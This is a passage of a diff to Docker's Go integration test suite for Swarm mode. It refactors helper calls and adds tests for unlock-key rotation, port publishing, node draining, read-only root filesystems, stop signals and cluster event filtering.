:= icmd.RunCmd(cmd) - if err == nil { + if result.Error == nil { // On occasion, 
the daemon may not have finished // rotating the KEK before restarting. The test is // intentionally written to explore this behavior. @@ -996,26 +1338,25 @@ func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { time.Sleep(3 * time.Second) - c.Assert(d.Restart(), checker.IsNil) + d.Restart(c) - cmd = d.command("swarm", "unlock") + cmd = d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString(unlockKey) - out, err = cmd.CombinedOutput() + result = icmd.RunCmd(cmd) } - c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out))) - c.Assert(string(out), checker.Contains, "invalid key") + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "invalid key", + }) outs, _ = d.Cmd("node", "ls") c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") - cmd = d.command("swarm", "unlock") + cmd = d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString(newUnlockKey) - out, err = cmd.CombinedOutput() - c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out))) + icmd.RunCmd(cmd).Assert(c, icmd.Success) - info, err = d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) outs, err = d.Cmd("node", "ls") c.Assert(err, checker.IsNil) @@ -1025,185 +1366,193 @@ func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { } } -func (s *DockerSwarmSuite) TestExtraHosts(c *check.C) { - d := s.AddDaemon(c, true, true) +// This differs from `TestSwarmRotateUnlockKey` because that one rotates a single node, which is the leader. +// This one keeps the leader up, and asserts that other manager nodes in the cluster also have their unlock +// key rotated. 
+func (s *DockerSwarmSuite) TestSwarmClusterRotateUnlockKey(c *check.C) { + d1 := s.AddDaemon(c, true, true) // leader - don't restart this one, we don't want leader election delays + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) - // Create a service - name := "top" - _, err := d.Cmd("service", "create", "--name", name, "--host=example.com:1.2.3.4", "busybox", "top") - c.Assert(err, checker.IsNil) + outs, err := d1.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + c.Assert(outs, checker.Contains, "docker swarm unlock") - // We need to get the container id. - out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") - c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + var unlockKey string + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } - // Compare against expected output. 
- expectedOutput := "1.2.3.4\texample.com" - out, err = d.Cmd("exec", id, "cat", "/etc/hosts") - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) -} + c.Assert(unlockKey, checker.Not(checker.Equals), "") -func (s *DockerSwarmSuite) TestSwarmManagerAddress(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - d3 := s.AddDaemon(c, true, false) + outs, err = d1.Cmd("swarm", "unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") - // Manager Addresses will always show Node 1's address - expectedOutput := fmt.Sprintf("Manager Addresses:\n 127.0.0.1:%d\n", d1.port) + // Rotate multiple times + for i := 0; i != 3; i++ { + outs, err = d1.Cmd("swarm", "unlock-key", "-q", "--rotate") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + // Strip \n + newUnlockKey := outs[:len(outs)-1] + c.Assert(newUnlockKey, checker.Not(checker.Equals), "") + c.Assert(newUnlockKey, checker.Not(checker.Equals), unlockKey) - out, err := d1.Cmd("info") - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, expectedOutput) - - out, err = d2.Cmd("info") - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, expectedOutput) + d2.Restart(c) + d3.Restart(c) - out, err = d3.Cmd("info") - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, expectedOutput) -} + for _, d := range []*daemon.Daemon{d2, d3} { + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) -func (s *DockerSwarmSuite) TestSwarmServiceInspectPretty(c *check.C) { - d := s.AddDaemon(c, true, true) + outs, _ := d.Cmd("node", "ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") - name := "top" - out, err := d.Cmd("service", "create", "--name", name, "--limit-cpu=0.5", "busybox", "top") - c.Assert(err, checker.IsNil, check.Commentf(out)) + cmd := d.Command("swarm", "unlock") + cmd.Stdin = 
bytes.NewBufferString(unlockKey) + result := icmd.RunCmd(cmd) + + if result.Error == nil { + // On occasion, the daemon may not have finished + // rotating the KEK before restarting. The test is + // intentionally written to explore this behavior. + // When this happens, unlocking with the old key will + // succeed. If we wait for the rotation to happen and + // restart again, the new key should be required this + // time. + + time.Sleep(3 * time.Second) + + d.Restart(c) + + cmd = d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + result = icmd.RunCmd(cmd) + } + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "invalid key", + }) + + outs, _ = d.Cmd("node", "ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + + cmd = d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(newUnlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) + + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked") + } - expectedOutput := ` -Resources: - Limits: - CPU: 0.5` - out, err = d.Cmd("service", "inspect", "--pretty", name) - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out)) + unlockKey = newUnlockKey + } } -func (s *DockerSwarmSuite) TestSwarmNetworkIPAMOptions(c *check.C) { +func (s *DockerSwarmSuite) TestSwarmAlternateLockUnlock(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("network", "create", "-d", "overlay", "--ipam-opt", "foo=bar", "foo") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + var unlockKey string + for i := 0; i < 2; i++ { + // set to lock + outs, err := d.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", 
outs)) + c.Assert(outs, checker.Contains, "docker swarm unlock") - out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]") + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } - out, err = d.Cmd("service", "create", "--network=foo", "--name", "top", "busybox", "top") - c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(unlockKey, checker.Not(checker.Equals), "") + checkSwarmUnlockedToLocked(c, d) - // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + cmd := d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) - out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]") + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("swarm", "update", "--autolock=false") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + checkSwarmLockedToUnlocked(c, d, unlockKey) + } } -// TODO: migrate to a unit test -// This test could be migrated to unit test and save costly integration test, -// once PR #29143 is merged. -func (s *DockerSwarmSuite) TestSwarmUpdateWithoutArgs(c *check.C) { +func (s *DockerSwarmSuite) TestExtraHosts(c *check.C) { d := s.AddDaemon(c, true, true) - expectedOutput := ` -Usage: docker swarm update [OPTIONS] + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--host=example.com:1.2.3.4", "busybox", "top") + c.Assert(err, checker.IsNil) -Update the swarm + // Make sure task has been deployed. 
+ waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) -Options:` + // We need to get the container id. + out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) - out, err := d.Cmd("swarm", "update") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) - c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out)) + // Compare against expected output. + expectedOutput := "1.2.3.4\texample.com" + out, err = d.Cmd("exec", id, "cat", "/etc/hosts") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) } -func (s *DockerTrustedSwarmSuite) TestTrustedServiceCreate(c *check.C) { - d := s.swarmSuite.AddDaemon(c, true, true) - - // Attempt creating a service from an image that is known to notary. - repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull") - - name := "trusted" - serviceCmd := d.command("-D", "service", "create", "--name", name, repoName, "top") - s.trustSuite.trustedCmd(serviceCmd) - out, _, err := runCommandWithOutput(serviceCmd) - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out)) - - out, err = d.Cmd("service", "inspect", "--pretty", name) - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out)) - - // Try trusted service create on an untrusted tag. 
+func (s *DockerSwarmSuite) TestSwarmManagerAddress(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) - repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - dockerCmd(c, "rmi", repoName) + // Manager Addresses will always show Node 1's address + expectedOutput := fmt.Sprintf("Manager Addresses:\n 127.0.0.1:%d\n", d1.SwarmPort) - name = "untrusted" - serviceCmd = d.command("service", "create", "--name", name, repoName, "top") - s.trustSuite.trustedCmd(serviceCmd) - out, _, err = runCommandWithOutput(serviceCmd) + out, err := d1.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) + out, err = d2.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) - out, err = d.Cmd("service", "inspect", "--pretty", name) - c.Assert(err, checker.NotNil, check.Commentf(out)) + out, err = d3.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) } -func (s *DockerTrustedSwarmSuite) TestTrustedServiceUpdate(c *check.C) { - d := s.swarmSuite.AddDaemon(c, true, true) - - // Attempt creating a service from an image that is known to notary. 
- repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull") - - name := "myservice" - - // Create a service without content trust - _, err := d.Cmd("service", "create", "--name", name, repoName, "top") - c.Assert(err, checker.IsNil) +func (s *DockerSwarmSuite) TestSwarmNetworkIPAMOptions(c *check.C) { + d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "inspect", "--pretty", name) + out, err := d.Cmd("network", "create", "-d", "overlay", "--ipam-opt", "foo=bar", "foo") c.Assert(err, checker.IsNil, check.Commentf(out)) - // Daemon won't insert the digest because this is disabled by - // DOCKER_SERVICE_PREFER_OFFLINE_IMAGE. - c.Assert(out, check.Not(checker.Contains), repoName+"@", check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - serviceCmd := d.command("-D", "service", "update", "--image", repoName, name) - s.trustSuite.trustedCmd(serviceCmd) - out, _, err = runCommandWithOutput(serviceCmd) + out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Contains, "foo:bar") + c.Assert(strings.TrimSpace(out), checker.Contains, "com.docker.network.ipam.serial:true") - out, err = d.Cmd("service", "inspect", "--pretty", name) + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--network=foo", "--name", "top", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out)) - - // Try trusted service update on an untrusted tag. 
- - repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - dockerCmd(c, "rmi", repoName) - serviceCmd = d.command("service", "update", "--image", repoName, name) - s.trustSuite.trustedCmd(serviceCmd) - out, _, err = runCommandWithOutput(serviceCmd) + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) + out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Contains, "foo:bar") + c.Assert(strings.TrimSpace(out), checker.Contains, "com.docker.network.ipam.serial:true") } // Test case for issue #27866, which did not allow NW name that is the prefix of a swarm NW ID. @@ -1252,3 +1601,462 @@ func (s *DockerSwarmSuite) TestSwarmNetworkCreateDup(c *check.C) { } } } + +func (s *DockerSwarmSuite) TestSwarmPublishDuplicatePorts(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--publish", "5005:80", "--publish", "5006:80", "--publish", "80", "--publish", "80", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + // make sure task has been deployed. 
+ waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + // Total len = 4, with 2 dynamic ports and 2 non-dynamic ports + // Dynamic ports are likely to be 30000 and 30001 but doesn't matter + out, err = d.Cmd("service", "inspect", "--format", "{{.Endpoint.Ports}} len={{len .Endpoint.Ports}}", id) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "len=4") + c.Assert(out, checker.Contains, "{ tcp 80 5005 ingress}") + c.Assert(out, checker.Contains, "{ tcp 80 5006 ingress}") +} + +func (s *DockerSwarmSuite) TestSwarmJoinWithDrain(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), "Drain") + + out, err = d.Cmd("swarm", "join-token", "-q", "manager") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + token := strings.TrimSpace(out) + + d1 := s.AddDaemon(c, false, false) + + out, err = d1.Cmd("swarm", "join", "--availability=drain", "--token", token, d.SwarmListenAddr()) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Drain") + + out, err = d1.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Drain") +} + +func (s *DockerSwarmSuite) TestSwarmInitWithDrain(c *check.C) { + d := s.AddDaemon(c, false, false) + + out, err := d.Cmd("swarm", "init", "--availability", "drain") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + out, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Drain") +} + +func (s *DockerSwarmSuite) TestSwarmReadonlyRootfs(c *check.C) { + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--detach", 
"--no-resolve-image", "--name", "top", "--read-only", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.ReadOnly }}", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") + + containers := d.ActiveContainers(c) + out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.HostConfig.ReadonlyRootfs}}", containers[0]) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") +} + +func (s *DockerSwarmSuite) TestNetworkInspectWithDuplicateNames(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "foo" + options := types.NetworkCreate{ + CheckDuplicate: false, + Driver: "bridge", + } + + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + n1, err := cli.NetworkCreate(context.Background(), name, options) + c.Assert(err, checker.IsNil) + + // Full ID always works + out, err := d.Cmd("network", "inspect", "--format", "{{.ID}}", n1.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID) + + // Name works if it is unique + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID) + + n2, err := cli.NetworkCreate(context.Background(), name, options) + c.Assert(err, checker.IsNil) + // Full ID always works + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n1.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID) + + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n2.ID) + c.Assert(err, checker.IsNil, 
check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n2.ID) + + // Name with duplicates + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", name) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "2 matches found based on name") + + out, err = d.Cmd("network", "rm", n2.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Dupliates with name but with different driver + options.Driver = "overlay" + + n2, err = cli.NetworkCreate(context.Background(), name, options) + c.Assert(err, checker.IsNil) + + // Full ID always works + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n1.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID) + + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n2.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n2.ID) + + // Name with duplicates + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", name) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "2 matches found based on name") +} + +func (s *DockerSwarmSuite) TestSwarmStopSignal(c *check.C) { + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top", "--stop-signal=SIGHUP", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // make sure task has been deployed. 
+ waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.StopSignal }}", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "SIGHUP") + + containers := d.ActiveContainers(c) + out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.Config.StopSignal}}", containers[0]) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "SIGHUP") + + out, err = d.Cmd("service", "update", "--detach", "--stop-signal=SIGUSR1", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.StopSignal }}", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "SIGUSR1") +} + +func (s *DockerSwarmSuite) TestSwarmServiceLsFilterMode(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top1", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top2", "--mode=global", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. 
+ waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 2) + + out, err = d.Cmd("service", "ls") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "top1") + c.Assert(out, checker.Contains, "top2") + c.Assert(out, checker.Not(checker.Contains), "localnet") + + out, err = d.Cmd("service", "ls", "--filter", "mode=global") + c.Assert(out, checker.Not(checker.Contains), "top1") + c.Assert(out, checker.Contains, "top2") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "ls", "--filter", "mode=replicated") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "top1") + c.Assert(out, checker.Not(checker.Contains), "top2") +} + +func (s *DockerSwarmSuite) TestSwarmInitUnspecifiedDataPathAddr(c *check.C) { + d := s.AddDaemon(c, false, false) + + out, err := d.Cmd("swarm", "init", "--data-path-addr", "0.0.0.0") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "data path address must be a non-zero IP") + + out, err = d.Cmd("swarm", "init", "--data-path-addr", "0.0.0.0:2000") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "data path address must be a non-zero IP") +} + +func (s *DockerSwarmSuite) TestSwarmJoinLeave(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("swarm", "join-token", "-q", "worker") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + token := strings.TrimSpace(out) + + // Verify that back to back join/leave does not cause panics + d1 := s.AddDaemon(c, false, false) + for i := 0; i < 10; i++ { + out, err = d1.Cmd("swarm", "join", "--token", token, d.SwarmListenAddr()) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + _, err = d1.Cmd("swarm", "leave") + c.Assert(err, checker.IsNil) + } +} + +const defaultRetryCount = 10 + +func waitForEvent(c *check.C, d 
*daemon.Daemon, since string, filter string, event string, retry int) string { + if retry < 1 { + c.Fatalf("retry count %d is invalid. It should be no less than 1", retry) + return "" + } + var out string + for i := 0; i < retry; i++ { + until := daemonUnixTime(c) + var err error + if len(filter) > 0 { + out, err = d.Cmd("events", "--since", since, "--until", until, filter) + } else { + out, err = d.Cmd("events", "--since", since, "--until", until) + } + c.Assert(err, checker.IsNil, check.Commentf(out)) + if strings.Contains(out, event) { + return strings.TrimSpace(out) + } + // no need to sleep after last retry + if i < retry-1 { + time.Sleep(200 * time.Millisecond) + } + } + c.Fatalf("docker events output '%s' doesn't contain event '%s'", out, event) + return "" +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsSource(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, false) + + // create a network + out, err := d1.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + networkID := strings.TrimSpace(out) + c.Assert(networkID, checker.Not(checker.Equals), "") + + // d1, d2 are managers that can get swarm events + waitForEvent(c, d1, "0", "-f scope=swarm", "network create "+networkID, defaultRetryCount) + waitForEvent(c, d2, "0", "-f scope=swarm", "network create "+networkID, defaultRetryCount) + + // d3 is a worker, not able to get cluster events + out = waitForEvent(c, d3, "0", "-f scope=swarm", "", 1) + c.Assert(out, checker.Not(checker.Contains), "network create ") +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsScope(c *check.C) { + d := s.AddDaemon(c, true, true) + + // create a service + out, err := d.Cmd("service", "create", "--no-resolve-image", "--name", "test", "--detach=false", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + serviceID := strings.Split(out, "\n")[0] + + // scope swarm filters 
cluster events + out = waitForEvent(c, d, "0", "-f scope=swarm", "service create "+serviceID, defaultRetryCount) + c.Assert(out, checker.Not(checker.Contains), "container create ") + + // all events are returned if scope is not specified + waitForEvent(c, d, "0", "", "service create "+serviceID, 1) + waitForEvent(c, d, "0", "", "container create ", defaultRetryCount) + + // scope local only shows non-cluster events + out = waitForEvent(c, d, "0", "-f scope=local", "container create ", 1) + c.Assert(out, checker.Not(checker.Contains), "service create ") +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsType(c *check.C) { + d := s.AddDaemon(c, true, true) + + // create a service + out, err := d.Cmd("service", "create", "--no-resolve-image", "--name", "test", "--detach=false", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + serviceID := strings.Split(out, "\n")[0] + + // create a network + out, err = d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + networkID := strings.TrimSpace(out) + c.Assert(networkID, checker.Not(checker.Equals), "") + + // filter by service + out = waitForEvent(c, d, "0", "-f type=service", "service create "+serviceID, defaultRetryCount) + c.Assert(out, checker.Not(checker.Contains), "network create") + + // filter by network + out = waitForEvent(c, d, "0", "-f type=network", "network create "+networkID, defaultRetryCount) + c.Assert(out, checker.Not(checker.Contains), "service create") +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsService(c *check.C) { + d := s.AddDaemon(c, true, true) + + // create a service + out, err := d.Cmd("service", "create", "--no-resolve-image", "--name", "test", "--detach=false", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + serviceID := strings.Split(out, "\n")[0] + + // validate service create event + waitForEvent(c, d, "0", "-f scope=swarm", "service create "+serviceID, 
defaultRetryCount) + + t1 := daemonUnixTime(c) + out, err = d.Cmd("service", "update", "--force", "--detach=false", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // wait for service update start + out = waitForEvent(c, d, t1, "-f scope=swarm", "service update "+serviceID, defaultRetryCount) + c.Assert(out, checker.Contains, "updatestate.new=updating") + + // allow service update complete. This is a service with 1 instance + time.Sleep(400 * time.Millisecond) + out = waitForEvent(c, d, t1, "-f scope=swarm", "service update "+serviceID, defaultRetryCount) + c.Assert(out, checker.Contains, "updatestate.new=completed, updatestate.old=updating") + + // scale service + t2 := daemonUnixTime(c) + out, err = d.Cmd("service", "scale", "test=3") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out = waitForEvent(c, d, t2, "-f scope=swarm", "service update "+serviceID, defaultRetryCount) + c.Assert(out, checker.Contains, "replicas.new=3, replicas.old=1") + + // remove service + t3 := daemonUnixTime(c) + out, err = d.Cmd("service", "rm", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + waitForEvent(c, d, t3, "-f scope=swarm", "service remove "+serviceID, defaultRetryCount) +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsNode(c *check.C) { + d1 := s.AddDaemon(c, true, true) + s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + d3ID := d3.NodeID() + waitForEvent(c, d1, "0", "-f scope=swarm", "node create "+d3ID, defaultRetryCount) + + t1 := daemonUnixTime(c) + out, err := d1.Cmd("node", "update", "--availability=pause", d3ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // filter by type + out = waitForEvent(c, d1, t1, "-f type=node", "node update "+d3ID, defaultRetryCount) + c.Assert(out, checker.Contains, "availability.new=pause, availability.old=active") + + t2 := daemonUnixTime(c) + out, err = d1.Cmd("node", "demote", d3ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + waitForEvent(c, d1, t2, 
